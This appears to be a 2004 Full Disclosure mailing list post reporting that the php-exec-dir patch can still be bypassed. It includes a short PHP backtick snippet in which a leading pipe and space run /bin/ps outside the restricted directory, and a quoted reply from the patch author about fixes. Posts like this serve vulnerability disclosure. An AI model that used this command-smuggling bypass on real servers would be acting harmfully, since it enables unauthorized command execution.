Home page logo

fulldisclosure logo Full Disclosure mailing list archives

php-exec-dir vulnerable after latest upgrade
From: "VeNoMouS" <venom () gen-x co nz>
Date: Thu, 8 Jul 2004 13:05:24 +1200


$blah = `| /bin/ps aux`;
echo nl2br($blah);

^^ do a |<space>ps exploits it again

i my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing inside it and i was still able to execute it, you HAVE to do the space after the pipe '|'.

----- Original Message ----- From: "C. McCohy" <mccohy () kyberdigi cz>
To: "VeNoMouS" <venom () gen-x co nz>
Sent: Wednesday, July 07, 2004 9:43 PM
Subject: Re: php-exec-dir vulnerable?

Ok I fixed all patches to all previous and current versions of the patch,
description can be found on the project homepage

Please inform all internet groups you have informed about the bug before.

Baj ... C. McCohy

While you are reading this text, an essential hacking tool
is being silently installed on your computer.

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]